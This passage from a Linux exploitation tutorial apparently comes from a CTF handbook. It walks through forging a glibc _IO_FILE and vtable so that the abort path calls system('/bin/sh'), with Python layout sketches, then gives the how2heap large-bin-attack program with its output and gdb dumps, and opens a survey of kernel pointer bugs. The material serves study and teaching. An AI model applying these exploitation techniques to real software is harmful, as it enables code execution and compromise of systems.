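The minus 0x10 accounts for the offset of the fd field inside a chunk, so the write bck->fd = unsorted_chunks (av) hits _IO_list_all itself.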
A note on error handling in glibc. When a memory error is detected, malloc_printerr() is usually called to print an error message. Let's follow the code:
static void
malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
{
[...]
if ((action & 5) == 5)
__libc_message (action & 2, "%s\n", str);
else if (action & 1)
{
char buf[2 * sizeof (uintptr_t) + 1];
buf[sizeof (buf) - 1] = '\0';
char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
while (cp > buf)
*--cp = '0';
__libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
__libc_argv[0] ? : "<unknown>", str, cp);
}
else if (action & 2)
abort ();
}
It calls __libc_message:
// sysdeps/posix/libc_fatal.c
/* Abort with an error message. */
void
__libc_message (int do_abort, const char *fmt, ...)
{
[...]
if (do_abort)
{
BEFORE_ABORT (do_abort, written, fd);
/* Kill the application. */
abort ();
}
}
When do_abort is set, abort() is called, which in turn calls fflush, that is, _IO_flush_all_lockp:
// stdlib/abort.c
#define fflush(s) _IO_flush_all_lockp (0)
if (stage == 1)
{
++stage;
fflush (NULL);
}
// libio/genops.c
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
struct _IO_FILE *fp;
int last_stamp;
#ifdef _IO_MTSAFE_IO
__libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
if (do_lock)
_IO_lock_lock (list_all_lock);
#endif
last_stamp = _IO_list_all_stamp;
fp = (_IO_FILE *) _IO_list_all; // overwritten by the attack
while (fp != NULL)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
#endif
)
&& _IO_OVERFLOW (fp, EOF) == EOF) // redirected to system
result = EOF;
if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
if (last_stamp != _IO_list_all_stamp)
{
/* Something was added to the list. Start all over again. */
fp = (_IO_FILE *) _IO_list_all;
last_stamp = _IO_list_all_stamp;
}
else
fp = fp->_chain; // points to the region we control
}
#ifdef _IO_MTSAFE_IO
if (do_lock)
_IO_lock_unlock (list_all_lock);
__libc_cleanup_region_end (0);
#endif
return result;
}
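_IO_list_all points to an object of type _IO_FILE_plus. Our goal is to overwrite the _IO_list_all pointer with a forged pointer whose _IO_OVERFLOW entry points to system and whose first 8 bytes are set to '/bin/sh', so that the call to _IO_OVERFLOW(fp, EOF) ends up as a call to system('/bin/sh').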
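The forged object can be laid out as raw bytes to see which fields matter. The sketch below uses the offsets given in the comments of the C listing (0x20, 0x28, 0xc0, 0xd8), which hold for the 64-bit libc-2.23 used there. The function names are hypothetical, the unsorted bin pointers that overlap the structure are omitted, and only the narrow-stream half of the condition in _IO_flush_all_lockp is modeled.

```python
import struct

OFF_WRITE_BASE = 0x20    # fp->_IO_write_base
OFF_WRITE_PTR = 0x28     # fp->_IO_write_ptr
OFF_MODE = 0xc0          # fp->_mode
OFF_VTABLE = 0xd8        # vtable pointer right after the _IO_FILE
OVERFLOW_INDEX = 3       # __overflow is the 4th slot of _IO_jump_t

def build_fake_file(vtable_addr):
    """Lay out the fields the listing sets on the old top chunk."""
    buf = bytearray(0xe0)
    buf[0:8] = b"/bin/sh\x00"                       # becomes system()'s argument
    struct.pack_into("<Q", buf, 0x8, 0x61)          # forged chunk size (top[1])
    struct.pack_into("<Q", buf, OFF_WRITE_BASE, 2)
    struct.pack_into("<Q", buf, OFF_WRITE_PTR, 3)
    struct.pack_into("<i", buf, OFF_MODE, 0)
    struct.pack_into("<Q", buf, OFF_VTABLE, vtable_addr)
    return bytes(buf)

def would_call_overflow(fake):
    """Narrow-stream condition: _mode <= 0 and write_ptr > write_base."""
    mode = struct.unpack_from("<i", fake, OFF_MODE)[0]
    base = struct.unpack_from("<Q", fake, OFF_WRITE_BASE)[0]
    ptr = struct.unpack_from("<Q", fake, OFF_WRITE_PTR)[0]
    return mode <= 0 and ptr > base

fake = build_fake_file(0x602460)    # &top[12] when top is at 0x602400
print(would_call_overflow(fake), hex(OVERFLOW_INDEX * 8))
```

With _mode at 0 and _IO_write_ptr greater than _IO_write_base, the flush loop calls the function stored 0x18 bytes into the fake jump table, which is the jump_table[3] slot the listing fills with winner.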
// libio/libioP.h
/* We always allocate an extra word following an _IO_FILE.
This contains a pointer to the function jump table used.
This is for compatibility with C++ streambuf; the word can
be used to smash to a pointer to a virtual function table. */
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
};
// libio/libio.h
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags
/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */
#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
/* char* _save_gptr; char* _save_egptr; */
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
_IO_FILE_plus contains a pointer to a function jump table. The structure of _IO_jump_t is as follows:
// libio/libioP.h
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};
By forging the __overflow entry of _IO_jump_t with the address of system, we get a shell.
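When the memory error leads into _IO_flush_all_lockp, _IO_list_all still points into the unsorted bin, which is not an address we control. We therefore use fp->_chain to move fp to a place we do control. This is why the size field is set to 0x61: _IO_list_all is now &unsorted_bin-0x10, and offset 0x60 from there falls on smallbins[5]. If we now trigger an allocation of a small chunk that does not fit, malloc moves old top from the unsorted bin into smallbins[5]. In the _IO_FILE structure, offset 0x60 is struct _IO_marker *_markers and offset 0x68 is struct _IO_FILE *_chain, and both slots now hold the start address of old top. fp therefore ends up pointing to old top, which is an address we control.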
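The offsets quoted above can be checked by hand. The following is a minimal sketch, assuming an x86-64 (LP64) build; the field sizes, and the fields that come after _lock, are taken from the gdb output shown later in this section rather than from the truncated declaration, and layout() is a helper written for this illustration only.

```python
# Sketch: recompute field offsets of struct _IO_FILE for x86-64 (assumed LP64).
# Each entry is (name, size, alignment) in bytes, in declaration order.
PTR = (8, 8)
FIELDS = [("_flags", 4, 4)]
FIELDS += [(name, *PTR) for name in (
    "_IO_read_ptr", "_IO_read_end", "_IO_read_base",
    "_IO_write_base", "_IO_write_ptr", "_IO_write_end",
    "_IO_buf_base", "_IO_buf_end",
    "_IO_save_base", "_IO_backup_base", "_IO_save_end",
    "_markers", "_chain",
)]
FIELDS += [
    ("_fileno", 4, 4), ("_flags2", 4, 4), ("_old_offset", 8, 8),
    ("_cur_column", 2, 2), ("_vtable_offset", 1, 1), ("_shortbuf", 1, 1),
    ("_lock", 8, 8), ("_offset", 8, 8), ("_codecvt", 8, 8),
    ("_wide_data", 8, 8), ("_freeres_list", 8, 8), ("_freeres_buf", 8, 8),
    ("__pad5", 8, 8), ("_mode", 4, 4), ("_unused2", 20, 1),
]

def layout(fields):
    """Return ({name: offset}, total_size) using natural alignment."""
    offsets, pos = {}, 0
    for name, size, align in fields:
        pos = (pos + align - 1) // align * align  # round up to the alignment
        offsets[name] = pos
        pos += size
    return offsets, pos

offsets, size = layout(FIELDS)
for name in ("_IO_write_base", "_IO_write_ptr", "_markers", "_chain", "_mode"):
    print(f"{name:16} 0x{offsets[name]:02x}")
print(f"vtable           0x{size:02x}")  # the vtable pointer follows the _IO_FILE
```

Under these assumptions _markers lands at 0x60 and _chain at 0x68, as stated in the text, and the vtable pointer of _IO_FILE_plus sits at 0xd8.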
When redirecting _IO_OVERFLOW to system, a few conditions are checked first:
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
#endif
)
&& _IO_OVERFLOW (fp, EOF) == EOF) // needs to be redirected to system
// libio/libio.h
struct _IO_wide_data *_wide_data;
/* Extra data for wide character streams. */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;
wchar_t _shortbuf[1];
const struct _IO_jump_t *_wide_vtable;
};
So here we set fp->_mode = 0, fp->_IO_write_base = (char *) 2 and fp->_IO_write_ptr = (char *) 3 to get past the check.
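The condition can be modelled as a small predicate to see which field values let the call through. This is only a sketch of the boolean logic quoted above: the function and parameter names are made up for the illustration, and pointers are treated as plain integers.

```python
def reaches_overflow(mode, write_base, write_ptr,
                     vtable_offset=0, wide_write_base=0, wide_write_ptr=0):
    """Mirror the guard evaluated before _IO_OVERFLOW (fp, EOF) is called."""
    narrow = mode <= 0 and write_ptr > write_base
    wide = (vtable_offset == 0 and mode > 0
            and wide_write_ptr > wide_write_base)
    return narrow or wide

# Values chosen in the text: _mode = 0, _IO_write_base = 2, _IO_write_ptr = 3.
print(reaches_overflow(mode=0, write_base=2, write_ptr=3))
# An all-zero fake FILE would be skipped without calling _IO_OVERFLOW.
print(reaches_overflow(mode=0, write_base=0, write_ptr=0))
```

The first call returns True and the second False, which is why the two write pointers cannot simply be left at zero.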
Next we forge the _IO_jump_t and point its __overflow entry at winner:
gef➤ x/30gx p1-0x10+0x400
0x602400: 0x0068732f6e69622f 0x0000000000000061 <-- old top
0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 <-- bk points to io_list_all-0x10
0x602420: 0x0000000000000002 0x0000000000000003 <-- _IO_write_base, _IO_write_ptr
0x602430: 0x0000000000000000 0x0000000000000000
0x602440: 0x0000000000000000 0x0000000000000000
0x602450: 0x0000000000000000 0x0000000000000000
0x602460: 0x0000000000000000 0x0000000000000000
0x602470: 0x0000000000000000 0x00000000004006d3 <-- winner
0x602480: 0x0000000000000000 0x0000000000000000
0x602490: 0x0000000000000000 0x0000000000000000
0x6024a0: 0x0000000000000000 0x0000000000000000
0x6024b0: 0x0000000000000000 0x0000000000000000
0x6024c0: 0x0000000000000000 0x0000000000000000
0x6024d0: 0x0000000000000000 0x0000000000602460 <-- vtable
0x6024e0: 0x0000000000000000 0x0000000000000000
gef➤ p *((struct _IO_FILE_plus *) 0x602400)
$1 = {
file = {
_flags = 0x6e69622f,
_IO_read_ptr = 0x61 <error: Cannot access memory at address 0x61>,
_IO_read_end = 0x7ffff7dd1b78 <main_arena+88> "\020@b",
_IO_read_base = 0x7ffff7dd2510 "",
_IO_write_base = 0x2 <error: Cannot access memory at address 0x2>,
_IO_write_ptr = 0x3 <error: Cannot access memory at address 0x3>,
_IO_write_end = 0x0,
_IO_buf_base = 0x0,
_IO_buf_end = 0x0,
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x0,
_fileno = 0x0,
_flags2 = 0x0,
_old_offset = 0x4006d3,
_cur_column = 0x0,
_vtable_offset = 0x0,
_shortbuf = "",
_lock = 0x0,
_offset = 0x0,
_codecvt = 0x0,
_wide_data = 0x0,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0x0,
_mode = 0x0,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x602460
}
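Finally we allocate an arbitrary chunk. Because size <= 2*SIZE_SZ, the check in the code below fails and malloc_printerr is called, which reaches the _IO_OVERFLOW call in _IO_flush_all_lockp and gives us a shell.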
for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (victim->size > av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
size = chunksize (victim);
That covers all of the heap exploitation techniques in how2heap.
3.1.9 Linux Heap Exploitation (Part 4)
how2heap
large_bin_attack
#include<stdio.h>
#include<stdlib.h>
int main() {
unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;
fprintf(stderr, "The targets we want to rewrite on stack:\n");
fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
unsigned long *p1 = malloc(0x100);
fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
malloc(0x10);
unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
malloc(0x10);
unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
malloc(0x10);
// deal with tcache - libc-2.26
// int *a[10], *b[10], i;
// for (i = 0; i < 7; i++) {
// a[i] = malloc(0x100);
// b[i] = malloc(0x400);
// }
// for (i = 0; i < 7; i++) {
// free(a[i]);
// free(b[i]);
// }
free(p1);
free(p2);
fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
malloc(0x30);
fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);
fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
free(p3);
malloc(0x30);
fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
}
$ gcc -g large_bin_attack.c
$ ./a.out
The targets we want to rewrite on stack:
stack_var1 (0x7fffffffdeb0): 0
stack_var2 (0x7fffffffdeb8): 0
Now, we allocate the first chunk: 0x555555757000
Then, we allocate the second chunk(large chunk): 0x555555757130
Finally, we allocate the third chunk(large chunk): 0x555555757560
Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
Now we use a vulnerability to overwrite the freed second chunk
Finally, we free the third chunk and malloc again, targets should have already been rewritten:
stack_var1 (0x7fffffffdeb0): 0x555555757560
stack_var2 (0x7fffffffdeb8): 0x555555757560
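This technique can be used to overwrite a value at an arbitrary address, such as the stack variables stack_var1 and stack_var2. In practice it often serves as a prelude to another exploit, for example overwriting the global variable global_max_fast with a very large value before a fastbin attack.
First we allocate chunks p1, p2 and p3, with other chunks in between so that they are not coalesced when freed. The memory layout at this point is: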
gef➤ x/2gx &stack_var1
0x7fffffffde70: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1
0x555555757010: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-6
0x555555757110: 0x0000000000000000 0x0000000000000021
0x555555757120: 0x0000000000000000 0x0000000000000000
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2
0x555555757140: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3-6
0x555555757540: 0x0000000000000000 0x0000000000000021
0x555555757550: 0x0000000000000000 0x0000000000000000
0x555555757560: 0x0000000000000000 0x0000000000000411 <-- p3
0x555555757570: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3+(0x410/8)-2
0x555555757970: 0x0000000000000000 0x0000000000000021
0x555555757980: 0x0000000000000000 0x0000000000000000
0x555555757990: 0x0000000000000000 0x0000000000020671 <-- top
0x5555557579a0: 0x0000000000000000 0x0000000000000000
Next we free p1 and then p2; both free chunks are placed in the unsorted bin:
gef➤ x/8gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1 [be freed]
0x555555757010: 0x00007ffff7dd3b78 0x0000555555757130
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
0x555555757140: 0x0000555555757000 0x00007ffff7dd3b78
0x555555757150: 0x0000000000000000 0x0000000000000000
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
→ Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE) → Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
[+] Found 2 chunks in unsorted bin.
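We then malloc an arbitrary chunk. p1 is split in two: one part is returned as the allocated chunk and the remainder stays in the unsorted bin (this is what p1 is for; without it, p2 would be split instead). p2, meanwhile, is sorted into its large bin list: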
gef➤ x/14gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000041 <-- p1-1
0x555555757010: 0x00007ffff7dd3c78 0x00007ffff7dd3c78
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000000
0x555555757040: 0x0000000000000000 0x00000000000000d1 <-- p1-2 [be freed]
0x555555757050: 0x00007ffff7dd3b78 0x00007ffff7dd3b78 <-- fd, bk
0x555555757060: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
0x555555757140: 0x00007ffff7dd3f68 0x00007ffff7dd3f68 <-- fd, bk
0x555555757150: 0x0000555555757130 0x0000555555757130 <-- fd_nextsize, bk_nextsize
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
→ Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
gef➤ heap bins large
[ Large Bins for arena 'main_arena' ]
[+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
→ Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
[+] Found 1 chunks in 1 large non-empty bins.
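The sorting code is shown below. Note that chunks in a large bin are ordered from largest to smallest along the fd pointers, and chunks of equal size are ordered by most recent use: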
/* place chunk in bin */
if (in_smallbin_range (size))
{
[ ... ]
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
/* maintain large bins in sorted order */
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
{
[ ... ]
}
else
{
assert ((fwd->size & NON_MAIN_ARENA) == 0);
while ((unsigned long) size < fwd->size)
{
[ ... ]
}
if ((unsigned long) size == (unsigned long) fwd->size)
[ ... ]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
else
[ ... ]
}
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
Suppose we have a vulnerability that lets us modify chunk p2 while it sits in the large bin. With the sorting code above in mind, we forge p2 as follows:
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x00000000000003f1 <-- fake p2 [be freed]
0x555555757140: 0x0000000000000000 0x00007fffffffde60 <-- bk
0x555555757150: 0x0000000000000000 0x00007fffffffde58 <-- bk_nextsize
0x555555757160: 0x0000000000000000 0x0000000000000000
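As before, we free p3 so that it enters the unsorted bin, then call malloc so that p3 is sorted into the large bin. During this step the condition (unsigned long) (size) < (unsigned long) (bck->bk->size) is false, so execution enters the else branch, where fwd is the fake p2 and victim is p3. bck is then assigned (&stack_var1 - 2).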
While p3 is being placed into the large bin and sorted, our two stack variables are both overwritten with victim. The statements responsible are bck->fd = victim; and victim->bk_nextsize->fd_nextsize = victim; respectively.
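Both writes can be replayed outside of glibc. The sketch below models memory as a dictionary of 8-byte words and runs only the statements of the else branch shown earlier; the addresses come from the gdb dumps in this section, and sort_into_large_bin() is a name invented for this illustration.

```python
# Chunk field offsets on x86-64 (prev_size is at 0x00).
SIZE, FD, BK, FD_NEXTSIZE, BK_NEXTSIZE = 0x08, 0x10, 0x18, 0x20, 0x28

P2, P3 = 0x555555757130, 0x555555757560        # fake p2 (fwd) and p3 (victim)
STACK_VAR1, STACK_VAR2 = 0x7fffffffde70, 0x7fffffffde78

mem = {
    P2 + SIZE: 0x3f1, P2 + FD: 0, P2 + BK: STACK_VAR1 - 0x10,
    P2 + FD_NEXTSIZE: 0, P2 + BK_NEXTSIZE: STACK_VAR2 - 0x20,
    P3 + SIZE: 0x411,
    STACK_VAR1: 0, STACK_VAR2: 0,
}

def sort_into_large_bin(mem, victim, fwd):
    size = mem[victim + SIZE]
    # The forged size 0x3f1 is smaller than 0x411, so the while loop and the
    # equal-size case are both skipped and the final else branch runs.
    if size <= mem[fwd + SIZE]:
        raise ValueError("victim must be larger than fwd for this path")
    mem[victim + FD_NEXTSIZE] = fwd
    mem[victim + BK_NEXTSIZE] = mem[fwd + BK_NEXTSIZE]
    mem[fwd + BK_NEXTSIZE] = victim
    mem[mem[victim + BK_NEXTSIZE] + FD_NEXTSIZE] = victim   # lands on stack_var2
    bck = mem[fwd + BK]
    mem[victim + BK] = bck
    mem[victim + FD] = fwd
    mem[fwd + BK] = victim
    mem[bck + FD] = victim                                  # lands on stack_var1

sort_into_large_bin(mem, P3, P2)
print(hex(mem[STACK_VAR1]), hex(mem[STACK_VAR2]))
```

The forged bk is &stack_var1 minus 0x10 because fd sits 0x10 bytes into a chunk, and the forged bk_nextsize is &stack_var2 minus 0x20 because fd_nextsize sits 0x20 bytes in.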
gef➤ x/2gx &stack_var1
0x7fffffffde70: 0x0000555555757560 0x0000555555757560
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x00000000000003f1
0x555555757140: 0x0000000000000000 0x0000555555757560
0x555555757150: 0x0000000000000000 0x0000555555757560
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3-2
0x555555757560: 0x0000000000000000 0x0000000000000411
0x555555757570: 0x0000555555757130 0x00007fffffffde60
0x555555757580: 0x0000555555757130 0x00007fffffffde58
0x555555757590: 0x0000000000000000 0x0000000000000000
On libc-2.26 the attack works the same way as long as tcache is dealt with: fill the tcache bins for both sizes before calling free.
3.1.11 Linux Kernel Exploitation
From User Mode to Kernel Mode
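Goal | User-mode exploitation | Kernel-mode exploitation |
---|---|---|
Brute-forcing the vulnerability | The application can crash and be restarted (or restart automatically) many times | This leaves the machine in an inconsistent state, usually causing a hang or a reboot |
Influencing the target | The attacker has more control over the target program (especially in a local attack), for example by setting up its runtime environment. The target program is the sole consumer of its library subsystems (for example, the memory allocator) | The attacker has to compete with every other application that wants to "influence" the kernel. All applications are consumers of the kernel subsystems |
Executing shellcode | Shellcode can make kernel system calls through user-mode gates whose safety and correctness are already guaranteed | Shellcode runs at a higher privilege level and must return to the application correctly without disturbing the system |
Bypassing anti-exploitation protections | This requires increasingly sophisticated techniques | Most protections live in the kernel but do not protect the kernel itself. The attacker can even disable most of them |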
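Kernel Vulnerability Classes
Uninitialized, Unvalidated and Corrupted Pointer Dereferences
This class covers every use of a pointer whose target has been corrupted, was never set correctly, or has not been validated sufficiently.
A statically declared pointer is initialized to NULL, but in every other case a pointer is uninitialized until it is explicitly assigned, and its value is whatever happens to be in the memory where the pointer is stored. In the example below the pointer is stored on the stack, and its content is the string of "A" characters that the previous function left there: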
#include <stdio.h>
#include <string.h>
void big_stack_usage() {
char big[0x100];
memset(big, 'A', 0x100);
printf("Big stack: %p ~ %p\n", big, big+0x100);
}
void ptr_un_initialized() {
char *p;
printf("Pointer value: %p => %p\n", &p, p);
}
int main() {
big_stack_usage();
ptr_un_initialized();
}
$ gcc -fno-stack-protector pointer.c
$ ./a.out
Big stack: 0x7fffd6b0e400 ~ 0x7fffd6b0e500
Pointer value: 0x7fffd6b0e4f8 => 0x4141414141414141
Now a real-world example, from FreeBSD 8.0:
struct ucred ucred, *ucp; // [1]
[...]
refcount_init(&ucred.cr_ref, 1);
ucred.cr_uid = ip->i_uid;
ucred.cr_ngroups = 1;
ucred.cr_groups[0] = dp->i_gid; // [2]
ucp = &ucred;
At [1], ucred is declared on the stack, and at [2] cr_groups[0] is assigned dp->i_gid. Unfortunately, struct ucred is defined like this:
struct ucred {
u_int cr_ref; /* reference count */
[...]
gid_t *cr_groups; /* groups */
int cr_agroups; /* Available groups */
};
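cr_groups is a pointer, and it is used without ever being initialized. This means the value of dp->i_gid is written to an arbitrary address, determined by whatever was on the stack when ucred was allocated.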
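Next, unvalidated pointers, which typically arise when the kernel shares an address space with user processes. Kernel space sits above user space, and its page tables are replicated in the page tables of every process. Some virtual address is chosen as a limit: addresses above (or below) it belong to the kernel and the rest belong to user space. Kernel functions use this limit to decide whether a pointer refers to kernel or user space. In the former case little validation may be needed, but in the latter case extra care is required, otherwise a user-space address may be dereferenced in an uncontrolled way.
Here is a Linux example, CVE-2008-0009: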
error = get_user(base, &iov->iov_base); // [1]
[...]
if (unlikely(!base)) {
error = -EFAULT;
break;
}
[...]
sd.u.userptr = base; // [2]
[...]
size = __splice_from_pipe(pipe, &sd, pipe_to_user);
[...]
static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf, struct splice_desc *sd)
{
if (!fault_in_pages_writeable(sd->u.userptr, sd->len)) {
src = buf->ops->map(pipe, buf, 1);
ret = __copy_to_user_inatomic(sd->u.userptr, src + buf->offset, sd->len); // [3]
buf->ops->unmap(pipe, buf, src);
[...]
}
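The first part of the code comes from vmsplice_to_user(), which at [1] uses get_user() to fetch the destination pointer. That pointer is assumed to be a user address without any check and is passed at [2] to __splice_from_pipe(), together with pipe_to_user as the helper function. The helper, again without any check, calls __copy_to_user_inatomic() at [3] and dereferences the pointer. If the attacker supplies a kernel address, the bug allows writing arbitrary data to arbitrary kernel memory. Note also that Linux functions whose names begin with two underscores (such as __copy_to_user_inatomic()) perform no checks on the destination (or source) user pointer they are given.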
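The missing validation amounts to a range check against the address limit described earlier. The following sketch shows the idea only; USER_LIMIT and user_range_ok() are hypothetical names and values chosen for a 64-bit layout, not the kernel's actual implementation.

```python
USER_LIMIT = 0x0000_8000_0000_0000  # hypothetical first address above user space

def user_range_ok(addr, size, limit=USER_LIMIT):
    """Return True only if [addr, addr + size) lies entirely below limit."""
    if addr < 0 or size < 0:
        return False
    # Written as a subtraction so that a huge addr + size cannot slip through
    # after wrapping around in fixed-width arithmetic.
    return size <= limit and addr <= limit - size

print(user_range_ok(0x7ffd_0000_1000, 0x1000))       # ordinary user buffer
print(user_range_ok(0xffff_ffff_8100_0000, 0x1000))  # kernel address is rejected
```

A helper in the position of pipe_to_user would need a check of this kind before handing the pointer to a double-underscore copy routine.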
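Finally, a corrupted pointer is usually the result of another bug (such as a buffer overflow); the attacker can modify the pointer at will and gain further control.
Memory Corruption Vulnerabilities
These vulnerabilities arise when a programming error overwrites kernel memory, including the kernel stack and the kernel heap.
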